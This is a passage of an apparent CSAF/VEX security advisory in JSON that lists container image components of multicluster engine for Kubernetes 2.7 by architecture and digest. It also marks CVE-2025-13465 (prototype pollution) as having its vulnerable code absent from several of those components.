{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:1b2c836336117c0e04dc30101898117b68edf6489ad9da955453cb6e4491bb33_amd64 as a component of multicluster engine for Kubernetes 2.7",
"product_id": "multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:1b2c836336117c0e04dc30101898117b68edf6489ad9da955453cb6e4491bb33_amd64"
},
"product_reference": "registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:1b2c836336117c0e04dc30101898117b68edf6489ad9da955453cb6e4491bb33_amd64",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:259049072cf889d7b72fdae5b5a17bd2d4d6fd176cb1da4274b70f02c854dea9_ppc64le as a component of multicluster engine for Kubernetes 2.7",
"product_id": "multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:259049072cf889d7b72fdae5b5a17bd2d4d6fd176cb1da4274b70f02c854dea9_ppc64le"
},
"product_reference": "registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:259049072cf889d7b72fdae5b5a17bd2d4d6fd176cb1da4274b70f02c854dea9_ppc64le",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:90a96bb156d096a0c55fcf27b2dc0176e56c9b7388697ed17d9bbb257c39a3aa_s390x as a component of multicluster engine for Kubernetes 2.7",
"product_id": "multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:90a96bb156d096a0c55fcf27b2dc0176e56c9b7388697ed17d9bbb257c39a3aa_s390x"
},
"product_reference": "registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:90a96bb156d096a0c55fcf27b2dc0176e56c9b7388697ed17d9bbb257c39a3aa_s390x",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:f3aa3d1b579275dcdf403867cc9b140f34cfcdc099d4b87819ef7f4978af2be1_arm64 as a component of multicluster engine for Kubernetes 2.7",
"product_id": "multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:f3aa3d1b579275dcdf403867cc9b140f34cfcdc099d4b87819ef7f4978af2be1_arm64"
},
"product_reference": "registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:f3aa3d1b579275dcdf403867cc9b140f34cfcdc099d4b87819ef7f4978af2be1_arm64",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:21b52ad7c77dd21bc0a9a20a1ae6e2fc5d236b39e16dbfa82158ec80ef2846d4_ppc64le as a component of multicluster engine for Kubernetes 2.7",
"product_id": "multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:21b52ad7c77dd21bc0a9a20a1ae6e2fc5d236b39e16dbfa82158ec80ef2846d4_ppc64le"
},
"product_reference": "registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:21b52ad7c77dd21bc0a9a20a1ae6e2fc5d236b39e16dbfa82158ec80ef2846d4_ppc64le",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:6a83c52ba828f45e84550ba702ba86d5746057194d389b6959ab7486e8615b16_s390x as a component of multicluster engine for Kubernetes 2.7",
"product_id": "multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:6a83c52ba828f45e84550ba702ba86d5746057194d389b6959ab7486e8615b16_s390x"
},
"product_reference": "registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:6a83c52ba828f45e84550ba702ba86d5746057194d389b6959ab7486e8615b16_s390x",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:b22d17d474876f6079c86518dbc04e692ade54067cd4fc0c5660d8a1ba0937cf_amd64 as a component of multicluster engine for Kubernetes 2.7",
"product_id": "multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:b22d17d474876f6079c86518dbc04e692ade54067cd4fc0c5660d8a1ba0937cf_amd64"
},
"product_reference": "registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:b22d17d474876f6079c86518dbc04e692ade54067cd4fc0c5660d8a1ba0937cf_amd64",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:b34be4d5652efaee930bd26536547fd1fc04dda4060605dabc276e59f96a0a0c_arm64 as a component of multicluster engine for Kubernetes 2.7",
"product_id": "multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:b34be4d5652efaee930bd26536547fd1fc04dda4060605dabc276e59f96a0a0c_arm64"
},
"product_reference": "registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:b34be4d5652efaee930bd26536547fd1fc04dda4060605dabc276e59f96a0a0c_arm64",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:6ab181004adafad8a5cd0155da9e107ab3989ef97007e69decb7238a9b0597da_ppc64le as a component of multicluster engine for Kubernetes 2.7",
"product_id": "multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:6ab181004adafad8a5cd0155da9e107ab3989ef97007e69decb7238a9b0597da_ppc64le"
},
"product_reference": "registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:6ab181004adafad8a5cd0155da9e107ab3989ef97007e69decb7238a9b0597da_ppc64le",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:7782c711aff60d9ac0d8297431eabca6945752292b16beecdb52303ad22f1553_s390x as a component of multicluster engine for Kubernetes 2.7",
"product_id": "multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:7782c711aff60d9ac0d8297431eabca6945752292b16beecdb52303ad22f1553_s390x"
},
"product_reference": "registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:7782c711aff60d9ac0d8297431eabca6945752292b16beecdb52303ad22f1553_s390x",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:9a23dfe4c781261e8db8fbb65517d69c3532fba5e897978b8a7765864b84b495_amd64 as a component of multicluster engine for Kubernetes 2.7",
"product_id": "multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:9a23dfe4c781261e8db8fbb65517d69c3532fba5e897978b8a7765864b84b495_amd64"
},
"product_reference": "registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:9a23dfe4c781261e8db8fbb65517d69c3532fba5e897978b8a7765864b84b495_amd64",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:c29b2dc7510dcc147cf8460e4e39c0f2595edc4ff81f62c035333c6354776335_arm64 as a component of multicluster engine for Kubernetes 2.7",
"product_id": "multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:c29b2dc7510dcc147cf8460e4e39c0f2595edc4ff81f62c035333c6354776335_arm64"
},
"product_reference": "registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:c29b2dc7510dcc147cf8460e4e39c0f2595edc4ff81f62c035333c6354776335_arm64",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:08592505c61791b614511a2c51d9963aa3277ac9e2af98954b07e47e36ca6765_amd64 as a component of multicluster engine for Kubernetes 2.7",
"product_id": "multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:08592505c61791b614511a2c51d9963aa3277ac9e2af98954b07e47e36ca6765_amd64"
},
"product_reference": "registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:08592505c61791b614511a2c51d9963aa3277ac9e2af98954b07e47e36ca6765_amd64",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:1145c4b8c3606c2550986f1bf352835300f58d81f6c50d63846983a666602655_ppc64le as a component of multicluster engine for Kubernetes 2.7",
"product_id": "multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:1145c4b8c3606c2550986f1bf352835300f58d81f6c50d63846983a666602655_ppc64le"
},
"product_reference": "registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:1145c4b8c3606c2550986f1bf352835300f58d81f6c50d63846983a666602655_ppc64le",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:53c5fd16cd44f631ca08f6eb51e346d99950c9b4c6860743262c068074ba3c9f_arm64 as a component of multicluster engine for Kubernetes 2.7",
"product_id": "multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:53c5fd16cd44f631ca08f6eb51e346d99950c9b4c6860743262c068074ba3c9f_arm64"
},
"product_reference": "registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:53c5fd16cd44f631ca08f6eb51e346d99950c9b4c6860743262c068074ba3c9f_arm64",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:aed4dab31c6e0d932781c631022214fdea5b28e6ccdc00abee3e006d13befe8a_s390x as a component of multicluster engine for Kubernetes 2.7",
"product_id": "multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:aed4dab31c6e0d932781c631022214fdea5b28e6ccdc00abee3e006d13befe8a_s390x"
},
"product_reference": "registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:aed4dab31c6e0d932781c631022214fdea5b28e6ccdc00abee3e006d13befe8a_s390x",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/placement-rhel9@sha256:31acda49be5c46912447113bf6133b4457f1f49270741859cb1493b65474d203_ppc64le as a component of multicluster engine for Kubernetes 2.7",
"product_id": "multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:31acda49be5c46912447113bf6133b4457f1f49270741859cb1493b65474d203_ppc64le"
},
"product_reference": "registry.redhat.io/multicluster-engine/placement-rhel9@sha256:31acda49be5c46912447113bf6133b4457f1f49270741859cb1493b65474d203_ppc64le",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/placement-rhel9@sha256:66c468c37631e94fcc32442e93a149caf3ad4831d1817314983dde8ba145fd25_s390x as a component of multicluster engine for Kubernetes 2.7",
"product_id": "multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:66c468c37631e94fcc32442e93a149caf3ad4831d1817314983dde8ba145fd25_s390x"
},
"product_reference": "registry.redhat.io/multicluster-engine/placement-rhel9@sha256:66c468c37631e94fcc32442e93a149caf3ad4831d1817314983dde8ba145fd25_s390x",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/placement-rhel9@sha256:d24798fdb05f2c2959b03889dff46e58c3b15d531a3750d1cd153ae4fcfda087_amd64 as a component of multicluster engine for Kubernetes 2.7",
"product_id": "multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:d24798fdb05f2c2959b03889dff46e58c3b15d531a3750d1cd153ae4fcfda087_amd64"
},
"product_reference": "registry.redhat.io/multicluster-engine/placement-rhel9@sha256:d24798fdb05f2c2959b03889dff46e58c3b15d531a3750d1cd153ae4fcfda087_amd64",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/placement-rhel9@sha256:fce0a7344e9f0d86a8d5e5dbd70a3a8ef6a55567ade0a7345ffda3344d2617d6_arm64 as a component of multicluster engine for Kubernetes 2.7",
"product_id": "multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:fce0a7344e9f0d86a8d5e5dbd70a3a8ef6a55567ade0a7345ffda3344d2617d6_arm64"
},
"product_reference": "registry.redhat.io/multicluster-engine/placement-rhel9@sha256:fce0a7344e9f0d86a8d5e5dbd70a3a8ef6a55567ade0a7345ffda3344d2617d6_arm64",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:04cc5c05db5bd9bd83f529523cc003c0ebe72d1ab55b2617bee8375b5f11616e_amd64 as a component of multicluster engine for Kubernetes 2.7",
"product_id": "multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:04cc5c05db5bd9bd83f529523cc003c0ebe72d1ab55b2617bee8375b5f11616e_amd64"
},
"product_reference": "registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:04cc5c05db5bd9bd83f529523cc003c0ebe72d1ab55b2617bee8375b5f11616e_amd64",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:4ed9ab5ffc8c4fb0dc4c9faaa13e63c81dd40e2e04784bd7f48e81a0bd734a14_s390x as a component of multicluster engine for Kubernetes 2.7",
"product_id": "multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:4ed9ab5ffc8c4fb0dc4c9faaa13e63c81dd40e2e04784bd7f48e81a0bd734a14_s390x"
},
"product_reference": "registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:4ed9ab5ffc8c4fb0dc4c9faaa13e63c81dd40e2e04784bd7f48e81a0bd734a14_s390x",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:92230ad9427b8002fca17de62427089eaa409edcaa39554a96cf16c23b41b1bd_ppc64le as a component of multicluster engine for Kubernetes 2.7",
"product_id": "multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:92230ad9427b8002fca17de62427089eaa409edcaa39554a96cf16c23b41b1bd_ppc64le"
},
"product_reference": "registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:92230ad9427b8002fca17de62427089eaa409edcaa39554a96cf16c23b41b1bd_ppc64le",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:e8e78077943e22dfbf24b01d40f866954e39e783711a3ceab6c6f08e8e07fdce_arm64 as a component of multicluster engine for Kubernetes 2.7",
"product_id": "multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:e8e78077943e22dfbf24b01d40f866954e39e783711a3ceab6c6f08e8e07fdce_arm64"
},
"product_reference": "registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:e8e78077943e22dfbf24b01d40f866954e39e783711a3ceab6c6f08e8e07fdce_arm64",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:5a1f7f5125b9fff4c8b415e93eaad7257af8ffb3b70823917cf0eec075484b8b_amd64 as a component of multicluster engine for Kubernetes 2.7",
"product_id": "multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:5a1f7f5125b9fff4c8b415e93eaad7257af8ffb3b70823917cf0eec075484b8b_amd64"
},
"product_reference": "registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:5a1f7f5125b9fff4c8b415e93eaad7257af8ffb3b70823917cf0eec075484b8b_amd64",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:a47433ffe10df556b6bea4c0cc3c3f3ac508e1a9d6ab81981f7ab84afc34524c_arm64 as a component of multicluster engine for Kubernetes 2.7",
"product_id": "multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:a47433ffe10df556b6bea4c0cc3c3f3ac508e1a9d6ab81981f7ab84afc34524c_arm64"
},
"product_reference": "registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:a47433ffe10df556b6bea4c0cc3c3f3ac508e1a9d6ab81981f7ab84afc34524c_arm64",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:ae032d3383977818eab9f396217d9de8053e6a0fe2657a21fec9b4bae58940ed_ppc64le as a component of multicluster engine for Kubernetes 2.7",
"product_id": "multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:ae032d3383977818eab9f396217d9de8053e6a0fe2657a21fec9b4bae58940ed_ppc64le"
},
"product_reference": "registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:ae032d3383977818eab9f396217d9de8053e6a0fe2657a21fec9b4bae58940ed_ppc64le",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:d2e664349d706e81882258dae2d18de73c65d09649e7ac74f5616ecb81f2ffbe_s390x as a component of multicluster engine for Kubernetes 2.7",
"product_id": "multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:d2e664349d706e81882258dae2d18de73c65d09649e7ac74f5616ecb81f2ffbe_s390x"
},
"product_reference": "registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:d2e664349d706e81882258dae2d18de73c65d09649e7ac74f5616ecb81f2ffbe_s390x",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/registration-rhel9@sha256:2a8862c66d7bba87f0ab708d1644eb7c01840fc8f5b3b7373044aff4e219e000_s390x as a component of multicluster engine for Kubernetes 2.7",
"product_id": "multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:2a8862c66d7bba87f0ab708d1644eb7c01840fc8f5b3b7373044aff4e219e000_s390x"
},
"product_reference": "registry.redhat.io/multicluster-engine/registration-rhel9@sha256:2a8862c66d7bba87f0ab708d1644eb7c01840fc8f5b3b7373044aff4e219e000_s390x",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/registration-rhel9@sha256:2d091748418b3f6d3cdcc4b4d773c98c8a22cac2717ed5274a6d8c612af51f71_ppc64le as a component of multicluster engine for Kubernetes 2.7",
"product_id": "multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:2d091748418b3f6d3cdcc4b4d773c98c8a22cac2717ed5274a6d8c612af51f71_ppc64le"
},
"product_reference": "registry.redhat.io/multicluster-engine/registration-rhel9@sha256:2d091748418b3f6d3cdcc4b4d773c98c8a22cac2717ed5274a6d8c612af51f71_ppc64le",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/registration-rhel9@sha256:3589f0bf450892dbfe4bac6c5255ebec5109e1d5d2e102dfb8e3e5894427a9b5_amd64 as a component of multicluster engine for Kubernetes 2.7",
"product_id": "multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:3589f0bf450892dbfe4bac6c5255ebec5109e1d5d2e102dfb8e3e5894427a9b5_amd64"
},
"product_reference": "registry.redhat.io/multicluster-engine/registration-rhel9@sha256:3589f0bf450892dbfe4bac6c5255ebec5109e1d5d2e102dfb8e3e5894427a9b5_amd64",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/registration-rhel9@sha256:4dfb3a2b2ea2a32c5cfc770c84fba0f158d2c759d3a6559b01efd365e4a19e52_arm64 as a component of multicluster engine for Kubernetes 2.7",
"product_id": "multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:4dfb3a2b2ea2a32c5cfc770c84fba0f158d2c759d3a6559b01efd365e4a19e52_arm64"
},
"product_reference": "registry.redhat.io/multicluster-engine/registration-rhel9@sha256:4dfb3a2b2ea2a32c5cfc770c84fba0f158d2c759d3a6559b01efd365e4a19e52_arm64",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/work-rhel9@sha256:2bc2bb010570cb1f65205b4c6f7f470e8b2242d1401f4d0ab8ba08bdabacefeb_amd64 as a component of multicluster engine for Kubernetes 2.7",
"product_id": "multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/work-rhel9@sha256:2bc2bb010570cb1f65205b4c6f7f470e8b2242d1401f4d0ab8ba08bdabacefeb_amd64"
},
"product_reference": "registry.redhat.io/multicluster-engine/work-rhel9@sha256:2bc2bb010570cb1f65205b4c6f7f470e8b2242d1401f4d0ab8ba08bdabacefeb_amd64",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/work-rhel9@sha256:495dece80910102a98e78394ca35ee5c4703d32f705f43f9813312872dd8b528_arm64 as a component of multicluster engine for Kubernetes 2.7",
"product_id": "multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/work-rhel9@sha256:495dece80910102a98e78394ca35ee5c4703d32f705f43f9813312872dd8b528_arm64"
},
"product_reference": "registry.redhat.io/multicluster-engine/work-rhel9@sha256:495dece80910102a98e78394ca35ee5c4703d32f705f43f9813312872dd8b528_arm64",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/work-rhel9@sha256:86ed174f04e82706d3c5a793fc94c5f3ff78ef7a442056e9ffbfdf04543e47e8_s390x as a component of multicluster engine for Kubernetes 2.7",
"product_id": "multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/work-rhel9@sha256:86ed174f04e82706d3c5a793fc94c5f3ff78ef7a442056e9ffbfdf04543e47e8_s390x"
},
"product_reference": "registry.redhat.io/multicluster-engine/work-rhel9@sha256:86ed174f04e82706d3c5a793fc94c5f3ff78ef7a442056e9ffbfdf04543e47e8_s390x",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/work-rhel9@sha256:a80ab7578c04779f5a91eb489efe6dfa821c2f22fad92f34864402604ae6d89a_ppc64le as a component of multicluster engine for Kubernetes 2.7",
"product_id": "multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/work-rhel9@sha256:a80ab7578c04779f5a91eb489efe6dfa821c2f22fad92f34864402604ae6d89a_ppc64le"
},
"product_reference": "registry.redhat.io/multicluster-engine/work-rhel9@sha256:a80ab7578c04779f5a91eb489efe6dfa821c2f22fad92f34864402604ae6d89a_ppc64le",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.7"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2025-13465",
"cwe": {
"id": "CWE-1321",
"name": "Improperly Controlled Modification of Object Prototype Attributes (\u0027Prototype Pollution\u0027)"
},
"discovery_date": "2026-01-21T20:01:28.774829+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:4667db4cc9699f5e41cda6388eb7371ad9c8c73a92a7fc19115ddd48b562e56e_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:c09c8b8f588cac2b8c4b15a79de635971f002419ffc2b4d967f383160897e2dd_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:d00a17c4162336d52d47452f13d2470ddd4f9d6913759472791ee4d8bfc34d46_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:fe8b267cb2ea707fda229bae30ca074079da2909e7313eff06ba9eb2fb529237_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:76d00b37dc5c5d7bf489f55f3a41a953677449491b01c789bf7b29c789c461b7_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:a2fa219ec0da0910c1a858ac43d53288f2cf434c26fcb6cd8185e9d6f13a1ebd_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:c4e710e3ab66dfbcb3f2db4d17f73aea44ea9d2649e5f5cec94c1b51644809cf_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:c6a8bf6b7644c45a41d4c8a1c31cc08e03b6ac5ed36f562256cb1509f26a47c7_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:6ae1271bcaebb79d7dd48fa4bb89f2cf0bf450cce004899feee7d1a53d230a81_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:8ffc2f2cdfd7753c083ca083a42da60b8783d09b6817c6b22c38c91d67c0b4a5_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:9295aea24d0997fd5112e4bc6701f15e5ed2ee54f298d134aef5c9d499ad7ce5_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:fb103ee7a47badea6dfd32f698cc209bb2242dd90b51986cea6f26a03ade9516_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:8173d4f41f25103f387f1b148f9e90eba72abeccd506bfe657f6fd54cbbcf395_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:e146412fb2f0d808cf6a0faa5f39e54032cd4b6c594d67795bb81883ebf0b386_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:ec486aa31c687d3f9e8dffe7ae5018b9ce3cc8795a91765c237eb72b2f6984c5_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:fb47b5a6d4fe1c966eb29109c27a5e323b6b4e665a2754f234979cef4bfc6fc2_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:111a02c966b528a619c9ad5942151e64374e0c57d80be21f91c0f41469c63c19_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:1396ea60940f7dfc33d67d918dd82d62f780d0e837e12785ccec2ada30ce3f93_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:4c393e89346494a9abd31c664e977edacd6ca8bf1f1c28c2aa9a6625f0d02d9f_arm64",
